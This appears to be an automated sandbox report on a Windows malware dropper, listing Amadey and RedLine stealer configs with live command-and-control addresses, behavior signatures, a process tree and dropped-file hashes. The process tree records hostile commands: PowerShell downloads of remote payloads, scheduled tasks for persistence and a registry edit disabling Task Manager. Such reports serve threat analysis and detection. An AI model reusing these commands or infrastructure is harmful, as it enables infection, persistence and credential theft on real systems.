Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows11-21h2_x64 -
resource
win11-20240611-en -
resource tags
-
submitted
23-06-2024 18:50
General
-
Target
9a3412ff28928d1c2178a090a989dfe961f7c8acfee179217814c98b55620446.exe
-
Size
1.8MB
-
MD5
74567fb6c1a91b1fc4af041fd8d95a11
-
SHA1
1a248b15186b94f07c5e85fa771da48b1afa0bba
-
SHA256
9a3412ff28928d1c2178a090a989dfe961f7c8acfee179217814c98b55620446
-
SHA512
18028b2bfd4eda27a95507a1f407791bcb88d17f91ec9ea48a53f01141562ce4580b12345cb22ebb81a976b1ff63d8c379f65bf4b1cd0d7c0d332f159b3dec08
-
SSDEEP
49152:ywQZVyYSKDxTamqIhfrtlYYiqPx76vRI:YHSI1qIhztYqH
Malware Config
Extracted
amadey
8254624243
e76b71
http://77.91.77.81
-
install_dir
8254624243
-
install_file
axplong.exe
-
strings_key
90049e51fabf09df0d6748e0b271922e
-
url_paths
/Kiru9gu/index.php
Extracted
redline
AMA
185.215.113.67:40960
Extracted
redline
LiveTraffic
4.185.27.237:13528
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 3 IoCs
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
-
Blocklisted process makes network request 4 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Powershell Invoke Web Request.
-
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 10 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Executes dropped EXE 16 IoCs
-
Identifies Wine through registry keys 2 TTPs 5 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Drops file in Windows directory 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies registry class 1 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 37 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
-
Suspicious use of AdjustPrivilegeToken 12 IoCs
-
Suspicious use of FindShellTrayWindow 26 IoCs
-
Suspicious use of SendNotifyMessage 12 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\9a3412ff28928d1c2178a090a989dfe961f7c8acfee179217814c98b55620446.exe"C:\Users\Admin\AppData\Local\Temp\9a3412ff28928d1c2178a090a989dfe961f7c8acfee179217814c98b55620446.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1000007001\ama.exe"C:\Users\Admin\AppData\Local\Temp\1000007001\ama.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\6.exe"C:\Users\Admin\AppData\Local\Temp\6.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\7.exe"C:\Users\Admin\AppData\Local\Temp\7.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.co/1lLub4⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff0ded3cb8,0x7fff0ded3cc8,0x7fff0ded3cd85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,506981416837234588,12599170653189614310,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1904 /prefetch:25⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1908,506981416837234588,12599170653189614310,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1908,506981416837234588,12599170653189614310,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2772 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,506981416837234588,12599170653189614310,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,506981416837234588,12599170653189614310,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1908,506981416837234588,12599170653189614310,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5416 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1908,506981416837234588,12599170653189614310,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5420 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,506981416837234588,12599170653189614310,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4588 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,506981416837234588,12599170653189614310,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5420 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,506981416837234588,12599170653189614310,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5608 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,506981416837234588,12599170653189614310,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5636 /prefetch:15⤵
-
C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe"C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe"C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe"C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1000014001\1.exe"C:\Users\Admin\AppData\Local\Temp\1000014001\1.exe"5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1424 -s 3846⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000091001\Installer.exe"C:\Users\Admin\AppData\Local\Temp\1000091001\Installer.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd /c ins.bat4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"5⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"5⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\install.bat' -Verb runAs -WindowStyle Hidden"5⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\install.bat"6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "Cleaner" /tr "C:\Users\Admin\AppData\Local\Corporation\File\RemoteExecuteScriptSilent.exe" /sc onstart /delay 0005:007⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableTaskMgr /t REG_DWORD /d 000000017⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F7⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F7⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/frielandrews892/File/releases/download/File/File.zip' -OutFile 'C:\Users\Admin\AppData\Local\Corporation.zip'"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Expand-Archive -Path 'C:\Users\Admin\AppData\Local\Corporation.zip' -DestinationPath 'C:\Users\Admin\AppData\Local\Corporation'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exeschtasks /query /TN "Cleaner"5⤵
-
C:\Users\Admin\AppData\Local\Temp\1000092001\legs.exe"C:\Users\Admin\AppData\Local\Temp\1000092001\legs.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 2524⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000094001\taskweaker.exe"C:\Users\Admin\AppData\Local\Temp\1000094001\taskweaker.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeC:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4464 -ip 44641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1424 -ip 14241⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exeC:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exeC:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exeC:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exeC:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v13
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751Filesize
717B
MD5822467b728b7a66b081c91795373789a
SHA1d8f2f02e1eef62485a9feffd59ce837511749865
SHA256af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751Filesize
192B
MD597c1e158c509e27cd7a89a0898879410
SHA197b0900b363bf8ab3d42c0f4625960359c6c0fb0
SHA2569cfca11a3f68c526715dbbfcbaf2c5f5c9ea6ef1bd936cac5062dd80ccb9adca
SHA512efd647800a338bdb856186ca1b714730e62d2667691600b0b403ac99364e6682fbbfdebfa38dc149f3e401d5d823a65ee879d67d1248a15f2f84d4b22c0f6f11
-
C:\Users\Admin\AppData\Local\Corporation.zipFilesize
16.3MB
MD59cb5edb138b8df3492c0b14b56d617ac
SHA1b02dfae970d31251d2f94cf14328f757ceb45c98
SHA256de8c63974461298010c9b9c8a97e769f72f271e976bdbb54dee45264f8a0eda8
SHA51250306f663098471c9aa51d9024bce4b8a25baec2fab2424909b481a4d223feda5311111831eb9084115686782c0c831f81ef5ccdb32b7a6833ff811ff51d4929
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD55f4c933102a824f41e258078e34165a7
SHA1d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.logFilesize
2KB
MD547b3bb3bf3bd31854ef77da134dc534f
SHA179f7ee98bfce765215cb9bc54d6c27a748af50f3
SHA25627bd7f1def6afae36983285feba3f689c7a006617a7d48cdac752bbd8ca39683
SHA512f0d52c49fe5de3abd83875dc52755fbdd7d70aa92d31abae733a8104742372cee2f2e59c5b71f6d667144e52c97c543b095a718ea63410e1709f55b73b4953d0
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD568de3df9998ac29e64228cf1c32c9649
SHA1be17a7ab177bef0f03c9d7bd2f25277d86e8fcee
SHA25696825c1e60e4a87dc5dbae78b97104e6968275fa1602c69053d0192cae143f43
SHA5121658b0bc504a8a5c57c496477cd800a893d751f03d632ef50aff9327cd33ad0e4e4f27bcb85b20bd22bef2ca65600b7d92e2a1f18fd3d08ad6391983de77beaf
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD56f738fcca0370135adb459fac0d129b9
SHA15af8b563ee883e0b27c1c312dc42245135f7d116
SHA2561d37a186c9be361a782dd6e45fe98b1f74215a26990af945a2b8b9aa4587ec63
SHA5128749675cdd8f667ff7ca0a0f04d5d9cad9121fd02ed786e66bcd3c1278d8eb9ce5995d3e38669612bdc4dccae83a2d1b10312db32d5097ef843512244f6f769a
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent StateFilesize
179B
MD5acb27da5871accd423ae23c5527dfe56
SHA1d0bfb28a4bf124f04654a84a23134e2ac538b6b1
SHA2567ecce8c1dc7a58271d4d8ba7e62b229a9d0ff7151b4865177b0a6ee1befaf001
SHA512b789052a131b1843f1f8261ab4859e16b3cc852cb21c2392831d9e164c82a1b4a430d02ba0b2dff80473e959d5f578f6b2bfdf7d3bcf136cd311b192fa2ef43e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
5KB
MD5f3d1508d400bc267370074107b33ce77
SHA18f4fb3849e5ca5ea729e59bb9302581f254b646f
SHA2569ef2ceb5d92b931969dc15e91ed37a4bbc63c4b579dac506ae7f34b31461de45
SHA512e230f2f98559044046108c865c54ac26a73220571d7b94e86d41e126de0ce5262dc0776d4003330b12d8718e962336c0ea93ca0ae3d31f1ce0afa21ac4d08290
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD53a7367f678feb319131545fa0d1cf38f
SHA1e20cc1c22c53b9133023f8d02f21692e44330e07
SHA25690f7e8f5bed5c262fa3b11054e78645e672527f785ae6a03c81e56c378b37d15
SHA5129415e0ac6e01a0f42954b493bf099b84ce56269d04d245c751db5f7ba789c5888d8c19acaca0646dc6a239b326656af4c29b065b7650d6a77272913ae8beab7b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
11KB
MD50e85af8dbb0cf5fffcf375db0037c041
SHA11080db45898434299cdeef7008f40c0820bc8b0f
SHA2560aa6fe05753375a5146053cc9c41e27958bb7dbb1a9ed2953561c60bf75af12f
SHA512a3e7562573ceab83025e0e586668ecd837f7ed8494dadbd2445a2d455ea4b0f7613efea0fd44de0bc50798542793af639aa64c583b05d98a79eaa3bf80dda0c8
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD55e6baeec02c3d93dce26652e7acebc90
SHA1937a7b4a0d42ea56e21a1a00447d899a2aca3c28
SHA256137bf90e25dbe4f70e614b7f6e61cba6c904c664858e1fe2bc749490b4a064c0
SHA512461990704004d7be6f273f1cee94ea73e2d47310bac05483fd98e3c8b678c42e7625d799ac76cf47fe5e300e7d709456e8c18f9854d35deb8721f6802d24bea4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD5eda44076dc3e4270fec4fcf70b27c7ff
SHA144c9b863d5df65dc9717aa863ed39ebcb6110269
SHA25698adfaf9b0f36986dbfbde6cb28a77d39278606966991514ccf5a62d23f85d52
SHA5128f94d6b73f418bd8d026593672416f013e6e589347a6d9608f065b04c8de16daabedade712b509b2e571ac5e67e71ca6d18971b5ccbfbdf9cf079c36034fa31a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD57355f4a1d4e1a2519a4a60ee11f1d192
SHA18802bbb71f3e8947c02a7d835b31c7abf4289780
SHA2562fac16b31607552d8f35d56232cb768ddc2f393c6162d243482466527005f4e3
SHA5127186100f86bc7a161667583daa5419d3b75acf620892610e0fab26866a4a300795a270bb5009b7af115216569c0d854fe1e3a68121af6f734fc16f7bfaed2d33
-
C:\Users\Admin\AppData\Local\Temp\1000007001\ama.exeFilesize
297KB
MD55d860e52bfa60fec84b6a46661b45246
SHA11259e9f868d0d80ac09aadb9387662347cd4bd68
SHA256b4a1e470f814bbcf1bc26c087eb513f4bab6165c90ecf43ac71dd87702561c30
SHA51204ea5757d01508a44e0152b3aa78f530908da649d59b8ce7ee3e15c2d4d0314c97f346c1e79b1810edb27165d04781c022937d02536dc9b1dd4c55f023a47701
-
C:\Users\Admin\AppData\Local\Temp\1000014001\1.exeFilesize
226KB
MD5f61c7b1a264cec5ccdf9df00ab136b05
SHA13aa84e4727bec8bb3c26c6b0fbdc55c25ddfcdf8
SHA256b1ff1451c947311f7841f5958213d65a5b33423d7bc751202cb1fcd0bc61cfc1
SHA512e8e29bb4118e061f49d0d27c178e3d01edf880fdf18fd39f9341e499196e0929cc4845578742d7da5ba4fd42d72487fa81fe826e3b2b746910d4698b9929f10a
-
C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exeFilesize
522KB
MD570a578f7f58456e475facd69469cf20a
SHA183e147e7ba01fa074b2f046b65978f838f7b1e8e
SHA2565c8d556e39269b22e63ba9c941ff306bb043bc35125ba08787617577231b381a
SHA512707ed48b45978d26faaf3544bf22912461503d6e4b1a077cbb7c3a8abd2f1eb3fec16b2786a79ae4db2dfec92f662ece1998bc142706d2b482599fb6191563c0
-
C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exeFilesize
310KB
MD56e3d83935c7a0810f75dfa9badc3f199
SHA19f7d7c0ea662bcdca9b0cda928dc339f06ef0730
SHA256dc4f0a8e3d12c98eac09a42bd976579ccc1851056d9de447495e8be7519760ed
SHA5129f6b22bc9d0306a69d3c5bab83c7603fa23925c12089f9608772602ab2c4c0908cda2a3d9592fc0fab4aaff209ef41d3e2a931511ce9dfd027691e8dce9ad9b9
-
C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exeFilesize
415KB
MD507101cac5b9477ba636cd8ca7b9932cb
SHA159ea7fd9ae6ded8c1b7240a4bf9399b4eb3849f1
SHA256488385cd54d14790b03fa7c7dc997ebea3f7b2a8499e5927eb437a3791102a77
SHA51202240ff51a74966bc31cfcc901105096eb871f588efaa9be1a829b4ee6f245bd9dca37be7e2946ba6315feea75c3dce5f490847250e62081445cd25b0f406887
-
C:\Users\Admin\AppData\Local\Temp\1000091001\Installer.exeFilesize
154KB
MD55f331887bec34f51cca7ea78815621f7
SHA12eb81490dd3a74aca55e45495fa162b31bcb79e7
SHA256d7ab2f309ee99f6545c9e1d86166740047965dd8172aec5f0038753c9ff5e9d8
SHA5127a66c5d043139a3b20814ac65110f8151cf652e3f9d959489781fdaea33e9f53ce9fd1992f1a32bff73380c7d9ef47200d8b924a8adf415e7a93421d62eb054d
-
C:\Users\Admin\AppData\Local\Temp\1000092001\legs.exeFilesize
659KB
MD5bbd06263062b2c536b5caacdd5f81b76
SHA1c38352c1c08fb0fa5e67a079998ef30ebc962089
SHA2561875275da8d576fd9962c5b2bd9fe0e4b4d188caad9549125c8a64ecaf9308c9
